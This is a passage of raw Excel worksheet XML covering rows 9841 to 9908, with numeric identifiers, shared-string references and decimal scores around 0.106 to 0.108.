      </c>
      <c r="B9841" s="2">
        <v>2.6035661E7</v>
      </c>
      <c r="C9841" s="2" t="s">
        <v>9407</v>
      </c>
      <c r="D9841" s="2">
        <v>1.0</v>
      </c>
      <c r="E9841" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9841" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="9842" ht="15.75" customHeight="1">
      <c r="A9842" s="1">
        <v>2948.0</v>
      </c>
      <c r="B9842" s="2">
        <v>3.5999262E7</v>
      </c>
      <c r="C9842" s="2" t="s">
        <v>9408</v>
      </c>
      <c r="D9842" s="2">
        <v>1.0</v>
      </c>
      <c r="E9842" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9842" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="9843" ht="15.75" customHeight="1">
      <c r="A9843" s="1">
        <v>7407.0</v>
      </c>
      <c r="B9843" s="2">
        <v>5.111296E7</v>
      </c>
      <c r="C9843" s="2" t="s">
        <v>9409</v>
      </c>
      <c r="D9843" s="2">
        <v>1.0</v>
      </c>
      <c r="E9843" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9843" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="9844" ht="15.75" customHeight="1">
      <c r="A9844" s="1">
        <v>11483.0</v>
      </c>
      <c r="B9844" s="2">
        <v>2.199227E7</v>
      </c>
      <c r="C9844" s="5" t="s">
        <v>9410</v>
      </c>
      <c r="D9844" s="2">
        <v>1.0</v>
      </c>
      <c r="E9844" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9844" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="9845" ht="15.75" customHeight="1">
      <c r="A9845" s="1">
        <v>22426.0</v>
      </c>
      <c r="B9845" s="2">
        <v>3.613713E7</v>
      </c>
      <c r="C9845" s="2" t="s">
        <v>9411</v>
      </c>
      <c r="D9845" s="2">
        <v>1.0</v>
      </c>
      <c r="E9845" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9845" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="9846" ht="15.75" customHeight="1">
      <c r="A9846" s="1">
        <v>25912.0</v>
      </c>
      <c r="B9846" s="2">
        <v>1.5091676E7</v>
      </c>
      <c r="C9846" s="2" t="s">
        <v>9412</v>
      </c>
      <c r="D9846" s="2">
        <v>1.0</v>
      </c>
      <c r="E9846" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9846" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="9847" ht="15.75" customHeight="1">
      <c r="A9847" s="1">
        <v>33157.0</v>
      </c>
      <c r="B9847" s="2">
        <v>7085831.0</v>
      </c>
      <c r="C9847" s="2" t="s">
        <v>9224</v>
      </c>
      <c r="D9847" s="2">
        <v>1.0</v>
      </c>
      <c r="E9847" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9847" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="9848" ht="15.75" customHeight="1">
      <c r="A9848" s="1">
        <v>33692.0</v>
      </c>
      <c r="B9848" s="2">
        <v>8455700.0</v>
      </c>
      <c r="C9848" s="2" t="s">
        <v>9413</v>
      </c>
      <c r="D9848" s="2">
        <v>1.0</v>
      </c>
      <c r="E9848" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9848" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="9849" ht="15.75" customHeight="1">
      <c r="A9849" s="1">
        <v>948.0</v>
      </c>
      <c r="B9849" s="2">
        <v>2.2571379E7</v>
      </c>
      <c r="C9849" s="2" t="s">
        <v>9414</v>
      </c>
      <c r="D9849" s="2">
        <v>1.0</v>
      </c>
      <c r="E9849" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9849" s="2">
        <v>0.1080808080808081</v>
      </c>
    </row>
    <row r="9850" ht="15.75" customHeight="1">
      <c r="A9850" s="1">
        <v>2058.0</v>
      </c>
      <c r="B9850" s="2">
        <v>3.1036773E7</v>
      </c>
      <c r="C9850" s="2" t="s">
        <v>9415</v>
      </c>
      <c r="D9850" s="2">
        <v>1.0</v>
      </c>
      <c r="E9850" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9850" s="2">
        <v>0.1080808080808081</v>
      </c>
    </row>
    <row r="9851" ht="15.75" customHeight="1">
      <c r="A9851" s="1">
        <v>6034.0</v>
      </c>
      <c r="B9851" s="2">
        <v>4.7573854E7</v>
      </c>
      <c r="C9851" s="2" t="s">
        <v>9416</v>
      </c>
      <c r="D9851" s="2">
        <v>1.0</v>
      </c>
      <c r="E9851" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9851" s="2">
        <v>0.1080808080808081</v>
      </c>
    </row>
    <row r="9852" ht="15.75" customHeight="1">
      <c r="A9852" s="1">
        <v>7625.0</v>
      </c>
      <c r="B9852" s="2">
        <v>5.1740714E7</v>
      </c>
      <c r="C9852" s="2" t="s">
        <v>9417</v>
      </c>
      <c r="D9852" s="2">
        <v>1.0</v>
      </c>
      <c r="E9852" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9852" s="2">
        <v>0.1080808080808081</v>
      </c>
    </row>
    <row r="9853" ht="15.75" customHeight="1">
      <c r="A9853" s="1">
        <v>8824.0</v>
      </c>
      <c r="B9853" s="2">
        <v>5.4649051E7</v>
      </c>
      <c r="C9853" s="2" t="s">
        <v>9418</v>
      </c>
      <c r="D9853" s="2">
        <v>1.0</v>
      </c>
      <c r="E9853" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9853" s="2">
        <v>0.1080808080808081</v>
      </c>
    </row>
    <row r="9854" ht="15.75" customHeight="1">
      <c r="A9854" s="1">
        <v>12733.0</v>
      </c>
      <c r="B9854" s="2">
        <v>3.1018116E7</v>
      </c>
      <c r="C9854" s="2" t="s">
        <v>9419</v>
      </c>
      <c r="D9854" s="2">
        <v>1.0</v>
      </c>
      <c r="E9854" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9854" s="2">
        <v>0.1080808080808081</v>
      </c>
    </row>
    <row r="9855" ht="15.75" customHeight="1">
      <c r="A9855" s="1">
        <v>13033.0</v>
      </c>
      <c r="B9855" s="2">
        <v>3.2961307E7</v>
      </c>
      <c r="C9855" s="2" t="s">
        <v>9420</v>
      </c>
      <c r="D9855" s="2">
        <v>1.0</v>
      </c>
      <c r="E9855" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9855" s="2">
        <v>0.1080808080808081</v>
      </c>
    </row>
    <row r="9856" ht="15.75" customHeight="1">
      <c r="A9856" s="1">
        <v>14651.0</v>
      </c>
      <c r="B9856" s="2">
        <v>4.0410035E7</v>
      </c>
      <c r="C9856" s="2" t="s">
        <v>9421</v>
      </c>
      <c r="D9856" s="2">
        <v>1.0</v>
      </c>
      <c r="E9856" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9856" s="2">
        <v>0.1080808080808081</v>
      </c>
    </row>
    <row r="9857" ht="15.75" customHeight="1">
      <c r="A9857" s="1">
        <v>15196.0</v>
      </c>
      <c r="B9857" s="2">
        <v>4.2062762E7</v>
      </c>
      <c r="C9857" s="2" t="s">
        <v>9422</v>
      </c>
      <c r="D9857" s="2">
        <v>1.0</v>
      </c>
      <c r="E9857" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9857" s="2">
        <v>0.1080808080808081</v>
      </c>
    </row>
    <row r="9858" ht="15.75" customHeight="1">
      <c r="A9858" s="1">
        <v>20657.0</v>
      </c>
      <c r="B9858" s="2">
        <v>1.4280376E7</v>
      </c>
      <c r="C9858" s="2" t="s">
        <v>9423</v>
      </c>
      <c r="D9858" s="2">
        <v>1.0</v>
      </c>
      <c r="E9858" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9858" s="2">
        <v>0.1080808080808081</v>
      </c>
    </row>
    <row r="9859" ht="15.75" customHeight="1">
      <c r="A9859" s="1">
        <v>45.0</v>
      </c>
      <c r="B9859" s="2">
        <v>1.0822916E7</v>
      </c>
      <c r="C9859" s="2" t="s">
        <v>9424</v>
      </c>
      <c r="D9859" s="2">
        <v>1.0</v>
      </c>
      <c r="E9859" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9859" s="2">
        <v>0.108080808080808</v>
      </c>
    </row>
    <row r="9860" ht="15.75" customHeight="1">
      <c r="A9860" s="1">
        <v>21156.0</v>
      </c>
      <c r="B9860" s="2">
        <v>1.8871637E7</v>
      </c>
      <c r="C9860" s="2" t="s">
        <v>9425</v>
      </c>
      <c r="D9860" s="2">
        <v>1.0</v>
      </c>
      <c r="E9860" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9860" s="2">
        <v>0.108080808080808</v>
      </c>
    </row>
    <row r="9861" ht="15.75" customHeight="1">
      <c r="A9861" s="1">
        <v>2603.0</v>
      </c>
      <c r="B9861" s="2">
        <v>3.4399726E7</v>
      </c>
      <c r="C9861" s="2" t="s">
        <v>9426</v>
      </c>
      <c r="D9861" s="2">
        <v>1.0</v>
      </c>
      <c r="E9861" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9861" s="2">
        <v>0.1080246913580247</v>
      </c>
    </row>
    <row r="9862" ht="15.75" customHeight="1">
      <c r="A9862" s="1">
        <v>2639.0</v>
      </c>
      <c r="B9862" s="2">
        <v>3.4598983E7</v>
      </c>
      <c r="C9862" s="2" t="s">
        <v>9427</v>
      </c>
      <c r="D9862" s="2">
        <v>1.0</v>
      </c>
      <c r="E9862" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9862" s="2">
        <v>0.1080246913580247</v>
      </c>
    </row>
    <row r="9863" ht="15.75" customHeight="1">
      <c r="A9863" s="1">
        <v>10621.0</v>
      </c>
      <c r="B9863" s="2">
        <v>1.3780442E7</v>
      </c>
      <c r="C9863" s="2" t="s">
        <v>9428</v>
      </c>
      <c r="D9863" s="2">
        <v>1.0</v>
      </c>
      <c r="E9863" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9863" s="2">
        <v>0.1080246913580247</v>
      </c>
    </row>
    <row r="9864" ht="15.75" customHeight="1">
      <c r="A9864" s="1">
        <v>12111.0</v>
      </c>
      <c r="B9864" s="2">
        <v>2.6874068E7</v>
      </c>
      <c r="C9864" s="2" t="s">
        <v>9429</v>
      </c>
      <c r="D9864" s="2">
        <v>1.0</v>
      </c>
      <c r="E9864" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9864" s="2">
        <v>0.1080246913580247</v>
      </c>
    </row>
    <row r="9865" ht="15.75" customHeight="1">
      <c r="A9865" s="1">
        <v>12977.0</v>
      </c>
      <c r="B9865" s="2">
        <v>3.26351E7</v>
      </c>
      <c r="C9865" s="2" t="s">
        <v>9430</v>
      </c>
      <c r="D9865" s="2">
        <v>1.0</v>
      </c>
      <c r="E9865" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9865" s="2">
        <v>0.1080246913580247</v>
      </c>
    </row>
    <row r="9866" ht="15.75" customHeight="1">
      <c r="A9866" s="1">
        <v>14168.0</v>
      </c>
      <c r="B9866" s="2">
        <v>3.8032309E7</v>
      </c>
      <c r="C9866" s="2" t="s">
        <v>9431</v>
      </c>
      <c r="D9866" s="2">
        <v>1.0</v>
      </c>
      <c r="E9866" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9866" s="2">
        <v>0.1080246913580247</v>
      </c>
    </row>
    <row r="9867" ht="15.75" customHeight="1">
      <c r="A9867" s="1">
        <v>21847.0</v>
      </c>
      <c r="B9867" s="2">
        <v>2.7168211E7</v>
      </c>
      <c r="C9867" s="2" t="s">
        <v>9432</v>
      </c>
      <c r="D9867" s="2">
        <v>1.0</v>
      </c>
      <c r="E9867" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9867" s="2">
        <v>0.1080246913580247</v>
      </c>
    </row>
    <row r="9868" ht="15.75" customHeight="1">
      <c r="A9868" s="1">
        <v>7769.0</v>
      </c>
      <c r="B9868" s="2">
        <v>5.2124217E7</v>
      </c>
      <c r="C9868" s="2" t="s">
        <v>9433</v>
      </c>
      <c r="D9868" s="2">
        <v>1.0</v>
      </c>
      <c r="E9868" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9868" s="2">
        <v>0.1079664570230608</v>
      </c>
    </row>
    <row r="9869" ht="15.75" customHeight="1">
      <c r="A9869" s="1">
        <v>7982.0</v>
      </c>
      <c r="B9869" s="2">
        <v>5.2725652E7</v>
      </c>
      <c r="C9869" s="2" t="s">
        <v>9434</v>
      </c>
      <c r="D9869" s="2">
        <v>1.0</v>
      </c>
      <c r="E9869" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9869" s="2">
        <v>0.1079664570230608</v>
      </c>
    </row>
    <row r="9870" ht="15.75" customHeight="1">
      <c r="A9870" s="1">
        <v>9880.0</v>
      </c>
      <c r="B9870" s="2">
        <v>5.6749085E7</v>
      </c>
      <c r="C9870" s="2" t="s">
        <v>9435</v>
      </c>
      <c r="D9870" s="2">
        <v>1.0</v>
      </c>
      <c r="E9870" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9870" s="2">
        <v>0.1079664570230608</v>
      </c>
    </row>
    <row r="9871" ht="15.75" customHeight="1">
      <c r="A9871" s="1">
        <v>27952.0</v>
      </c>
      <c r="B9871" s="2">
        <v>2.3870516E7</v>
      </c>
      <c r="C9871" s="2" t="s">
        <v>9436</v>
      </c>
      <c r="D9871" s="2">
        <v>1.0</v>
      </c>
      <c r="E9871" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9871" s="2">
        <v>0.1079664570230608</v>
      </c>
    </row>
    <row r="9872" ht="15.75" customHeight="1">
      <c r="A9872" s="1">
        <v>2222.0</v>
      </c>
      <c r="B9872" s="2">
        <v>3.2173077E7</v>
      </c>
      <c r="C9872" s="2" t="s">
        <v>9437</v>
      </c>
      <c r="D9872" s="2">
        <v>1.0</v>
      </c>
      <c r="E9872" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9872" s="2">
        <v>0.1079059829059829</v>
      </c>
    </row>
    <row r="9873" ht="15.75" customHeight="1">
      <c r="A9873" s="1">
        <v>8926.0</v>
      </c>
      <c r="B9873" s="2">
        <v>5.483597E7</v>
      </c>
      <c r="C9873" s="2" t="s">
        <v>9438</v>
      </c>
      <c r="D9873" s="2">
        <v>1.0</v>
      </c>
      <c r="E9873" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9873" s="2">
        <v>0.1079059829059829</v>
      </c>
    </row>
    <row r="9874" ht="15.75" customHeight="1">
      <c r="A9874" s="1">
        <v>13367.0</v>
      </c>
      <c r="B9874" s="2">
        <v>3.481491E7</v>
      </c>
      <c r="C9874" s="2" t="s">
        <v>9439</v>
      </c>
      <c r="D9874" s="2">
        <v>1.0</v>
      </c>
      <c r="E9874" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9874" s="2">
        <v>0.1079059829059829</v>
      </c>
    </row>
    <row r="9875" ht="15.75" customHeight="1">
      <c r="A9875" s="1">
        <v>15686.0</v>
      </c>
      <c r="B9875" s="2">
        <v>4.386116E7</v>
      </c>
      <c r="C9875" s="2" t="s">
        <v>9440</v>
      </c>
      <c r="D9875" s="2">
        <v>1.0</v>
      </c>
      <c r="E9875" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9875" s="2">
        <v>0.1079059829059829</v>
      </c>
    </row>
    <row r="9876" ht="15.75" customHeight="1">
      <c r="A9876" s="1">
        <v>7058.0</v>
      </c>
      <c r="B9876" s="2">
        <v>5.0200467E7</v>
      </c>
      <c r="C9876" s="2" t="s">
        <v>9441</v>
      </c>
      <c r="D9876" s="2">
        <v>1.0</v>
      </c>
      <c r="E9876" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9876" s="2">
        <v>0.1069651741293533</v>
      </c>
    </row>
    <row r="9877" ht="15.75" customHeight="1">
      <c r="A9877" s="1">
        <v>28226.0</v>
      </c>
      <c r="B9877" s="2">
        <v>2.5109897E7</v>
      </c>
      <c r="C9877" s="2" t="s">
        <v>9308</v>
      </c>
      <c r="D9877" s="2">
        <v>1.0</v>
      </c>
      <c r="E9877" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9877" s="2">
        <v>0.1067708333333333</v>
      </c>
    </row>
    <row r="9878" ht="15.75" customHeight="1">
      <c r="A9878" s="1">
        <v>8633.0</v>
      </c>
      <c r="B9878" s="2">
        <v>5.43182E7</v>
      </c>
      <c r="C9878" s="2" t="s">
        <v>9442</v>
      </c>
      <c r="D9878" s="2">
        <v>1.0</v>
      </c>
      <c r="E9878" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9878" s="2">
        <v>0.1065573770491803</v>
      </c>
    </row>
    <row r="9879" ht="15.75" customHeight="1">
      <c r="A9879" s="1">
        <v>14991.0</v>
      </c>
      <c r="B9879" s="2">
        <v>4.1419215E7</v>
      </c>
      <c r="C9879" s="2" t="s">
        <v>9443</v>
      </c>
      <c r="D9879" s="2">
        <v>1.0</v>
      </c>
      <c r="E9879" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9879" s="2">
        <v>0.1064814814814815</v>
      </c>
    </row>
    <row r="9880" ht="15.75" customHeight="1">
      <c r="A9880" s="1">
        <v>27486.0</v>
      </c>
      <c r="B9880" s="2">
        <v>2.2039069E7</v>
      </c>
      <c r="C9880" s="2" t="s">
        <v>9444</v>
      </c>
      <c r="D9880" s="2">
        <v>1.0</v>
      </c>
      <c r="E9880" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9880" s="2">
        <v>0.1064814814814815</v>
      </c>
    </row>
    <row r="9881" ht="15.75" customHeight="1">
      <c r="A9881" s="1">
        <v>28307.0</v>
      </c>
      <c r="B9881" s="2">
        <v>2.5646798E7</v>
      </c>
      <c r="C9881" s="2" t="s">
        <v>9445</v>
      </c>
      <c r="D9881" s="2">
        <v>1.0</v>
      </c>
      <c r="E9881" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9881" s="2">
        <v>0.1064814814814815</v>
      </c>
    </row>
    <row r="9882" ht="15.75" customHeight="1">
      <c r="A9882" s="1">
        <v>16467.0</v>
      </c>
      <c r="B9882" s="2">
        <v>4.6465908E7</v>
      </c>
      <c r="C9882" s="2" t="s">
        <v>9446</v>
      </c>
      <c r="D9882" s="2">
        <v>1.0</v>
      </c>
      <c r="E9882" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9882" s="2">
        <v>0.1064030131826742</v>
      </c>
    </row>
    <row r="9883" ht="15.75" customHeight="1">
      <c r="A9883" s="1">
        <v>234.0</v>
      </c>
      <c r="B9883" s="2">
        <v>1.4759899E7</v>
      </c>
      <c r="C9883" s="2" t="s">
        <v>9447</v>
      </c>
      <c r="D9883" s="2">
        <v>1.0</v>
      </c>
      <c r="E9883" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9883" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="9884" ht="15.75" customHeight="1">
      <c r="A9884" s="1">
        <v>2221.0</v>
      </c>
      <c r="B9884" s="2">
        <v>3.2158154E7</v>
      </c>
      <c r="C9884" s="2" t="s">
        <v>9448</v>
      </c>
      <c r="D9884" s="2">
        <v>1.0</v>
      </c>
      <c r="E9884" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9884" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="9885" ht="15.75" customHeight="1">
      <c r="A9885" s="1">
        <v>2293.0</v>
      </c>
      <c r="B9885" s="2">
        <v>3.2628333E7</v>
      </c>
      <c r="C9885" s="2" t="s">
        <v>9449</v>
      </c>
      <c r="D9885" s="2">
        <v>1.0</v>
      </c>
      <c r="E9885" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9885" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="9886" ht="15.75" customHeight="1">
      <c r="A9886" s="1">
        <v>2435.0</v>
      </c>
      <c r="B9886" s="2">
        <v>3.3629558E7</v>
      </c>
      <c r="C9886" s="2" t="s">
        <v>9450</v>
      </c>
      <c r="D9886" s="2">
        <v>1.0</v>
      </c>
      <c r="E9886" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9886" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="9887" ht="15.75" customHeight="1">
      <c r="A9887" s="1">
        <v>2479.0</v>
      </c>
      <c r="B9887" s="2">
        <v>3.3852295E7</v>
      </c>
      <c r="C9887" s="2" t="s">
        <v>9451</v>
      </c>
      <c r="D9887" s="2">
        <v>1.0</v>
      </c>
      <c r="E9887" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9887" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="9888" ht="15.75" customHeight="1">
      <c r="A9888" s="1">
        <v>2900.0</v>
      </c>
      <c r="B9888" s="2">
        <v>3.5731808E7</v>
      </c>
      <c r="C9888" s="2" t="s">
        <v>9452</v>
      </c>
      <c r="D9888" s="2">
        <v>1.0</v>
      </c>
      <c r="E9888" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9888" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="9889" ht="15.75" customHeight="1">
      <c r="A9889" s="1">
        <v>3068.0</v>
      </c>
      <c r="B9889" s="2">
        <v>3.6513227E7</v>
      </c>
      <c r="C9889" s="2" t="s">
        <v>9453</v>
      </c>
      <c r="D9889" s="2">
        <v>1.0</v>
      </c>
      <c r="E9889" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9889" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="9890" ht="15.75" customHeight="1">
      <c r="A9890" s="1">
        <v>3548.0</v>
      </c>
      <c r="B9890" s="2">
        <v>3.8758581E7</v>
      </c>
      <c r="C9890" s="2" t="s">
        <v>9454</v>
      </c>
      <c r="D9890" s="2">
        <v>1.0</v>
      </c>
      <c r="E9890" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9890" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="9891" ht="15.75" customHeight="1">
      <c r="A9891" s="1">
        <v>4440.0</v>
      </c>
      <c r="B9891" s="2">
        <v>4.2365736E7</v>
      </c>
      <c r="C9891" s="2" t="s">
        <v>9455</v>
      </c>
      <c r="D9891" s="2">
        <v>1.0</v>
      </c>
      <c r="E9891" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9891" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="9892" ht="15.75" customHeight="1">
      <c r="A9892" s="1">
        <v>4962.0</v>
      </c>
      <c r="B9892" s="2">
        <v>4.4076742E7</v>
      </c>
      <c r="C9892" s="2" t="s">
        <v>9456</v>
      </c>
      <c r="D9892" s="2">
        <v>1.0</v>
      </c>
      <c r="E9892" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9892" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="9893" ht="15.75" customHeight="1">
      <c r="A9893" s="1">
        <v>5071.0</v>
      </c>
      <c r="B9893" s="2">
        <v>4.4422093E7</v>
      </c>
      <c r="C9893" s="2" t="s">
        <v>9457</v>
      </c>
      <c r="D9893" s="2">
        <v>1.0</v>
      </c>
      <c r="E9893" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9893" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="9894" ht="15.75" customHeight="1">
      <c r="A9894" s="1">
        <v>6239.0</v>
      </c>
      <c r="B9894" s="2">
        <v>4.8082462E7</v>
      </c>
      <c r="C9894" s="2" t="s">
        <v>9458</v>
      </c>
      <c r="D9894" s="2">
        <v>1.0</v>
      </c>
      <c r="E9894" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9894" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="9895" ht="15.75" customHeight="1">
      <c r="A9895" s="1">
        <v>15046.0</v>
      </c>
      <c r="B9895" s="2">
        <v>4.1602688E7</v>
      </c>
      <c r="C9895" s="2" t="s">
        <v>9459</v>
      </c>
      <c r="D9895" s="2">
        <v>1.0</v>
      </c>
      <c r="E9895" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9895" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="9896" ht="15.75" customHeight="1">
      <c r="A9896" s="1">
        <v>16725.0</v>
      </c>
      <c r="B9896" s="2">
        <v>4.7480795E7</v>
      </c>
      <c r="C9896" s="2" t="s">
        <v>9460</v>
      </c>
      <c r="D9896" s="2">
        <v>1.0</v>
      </c>
      <c r="E9896" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9896" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="9897" ht="15.75" customHeight="1">
      <c r="A9897" s="1">
        <v>17719.0</v>
      </c>
      <c r="B9897" s="2">
        <v>5.0625673E7</v>
      </c>
      <c r="C9897" s="2" t="s">
        <v>9461</v>
      </c>
      <c r="D9897" s="2">
        <v>1.0</v>
      </c>
      <c r="E9897" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9897" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="9898" ht="15.75" customHeight="1">
      <c r="A9898" s="1">
        <v>18708.0</v>
      </c>
      <c r="B9898" s="2">
        <v>5.3643972E7</v>
      </c>
      <c r="C9898" s="2" t="s">
        <v>9462</v>
      </c>
      <c r="D9898" s="2">
        <v>1.0</v>
      </c>
      <c r="E9898" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9898" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="9899" ht="15.75" customHeight="1">
      <c r="A9899" s="1">
        <v>20483.0</v>
      </c>
      <c r="B9899" s="2">
        <v>1.2845578E7</v>
      </c>
      <c r="C9899" s="2" t="s">
        <v>9463</v>
      </c>
      <c r="D9899" s="2">
        <v>1.0</v>
      </c>
      <c r="E9899" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9899" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="9900" ht="15.75" customHeight="1">
      <c r="A9900" s="1">
        <v>20515.0</v>
      </c>
      <c r="B9900" s="2">
        <v>1.3074478E7</v>
      </c>
      <c r="C9900" s="2" t="s">
        <v>9464</v>
      </c>
      <c r="D9900" s="2">
        <v>1.0</v>
      </c>
      <c r="E9900" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9900" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="9901" ht="15.75" customHeight="1">
      <c r="A9901" s="1">
        <v>21215.0</v>
      </c>
      <c r="B9901" s="2">
        <v>1.9591143E7</v>
      </c>
      <c r="C9901" s="2" t="s">
        <v>9465</v>
      </c>
      <c r="D9901" s="2">
        <v>1.0</v>
      </c>
      <c r="E9901" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9901" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="9902" ht="15.75" customHeight="1">
      <c r="A9902" s="1">
        <v>21483.0</v>
      </c>
      <c r="B9902" s="2">
        <v>2.2997552E7</v>
      </c>
      <c r="C9902" s="2" t="s">
        <v>9466</v>
      </c>
      <c r="D9902" s="2">
        <v>1.0</v>
      </c>
      <c r="E9902" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9902" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="9903" ht="15.75" customHeight="1">
      <c r="A9903" s="1">
        <v>23164.0</v>
      </c>
      <c r="B9903" s="2">
        <v>5.1969014E7</v>
      </c>
      <c r="C9903" s="2" t="s">
        <v>9467</v>
      </c>
      <c r="D9903" s="2">
        <v>1.0</v>
      </c>
      <c r="E9903" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9903" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="9904" ht="15.75" customHeight="1">
      <c r="A9904" s="1">
        <v>25568.0</v>
      </c>
      <c r="B9904" s="2">
        <v>1.4319191E7</v>
      </c>
      <c r="C9904" s="2" t="s">
        <v>9468</v>
      </c>
      <c r="D9904" s="2">
        <v>1.0</v>
      </c>
      <c r="E9904" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9904" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="9905" ht="15.75" customHeight="1">
      <c r="A9905" s="1">
        <v>27741.0</v>
      </c>
      <c r="B9905" s="2">
        <v>2.3080918E7</v>
      </c>
      <c r="C9905" s="2" t="s">
        <v>9469</v>
      </c>
      <c r="D9905" s="2">
        <v>1.0</v>
      </c>
      <c r="E9905" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9905" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="9906" ht="15.75" customHeight="1">
      <c r="A9906" s="1">
        <v>29394.0</v>
      </c>
      <c r="B9906" s="2">
        <v>3.1932651E7</v>
      </c>
      <c r="C9906" s="2" t="s">
        <v>9470</v>
      </c>
      <c r="D9906" s="2">
        <v>1.0</v>
      </c>
      <c r="E9906" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9906" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="9907" ht="15.75" customHeight="1">
      <c r="A9907" s="1">
        <v>29490.0</v>
      </c>
      <c r="B9907" s="2">
        <v>3.2554975E7</v>
      </c>
      <c r="C9907" s="2" t="s">
        <v>9471</v>
      </c>
      <c r="D9907" s="2">
        <v>1.0</v>
      </c>
      <c r="E9907" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9907" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="9908" ht="15.75" customHeight="1">
      <c r="A9908" s="1">
        <v>30492.0</v>
      </c>
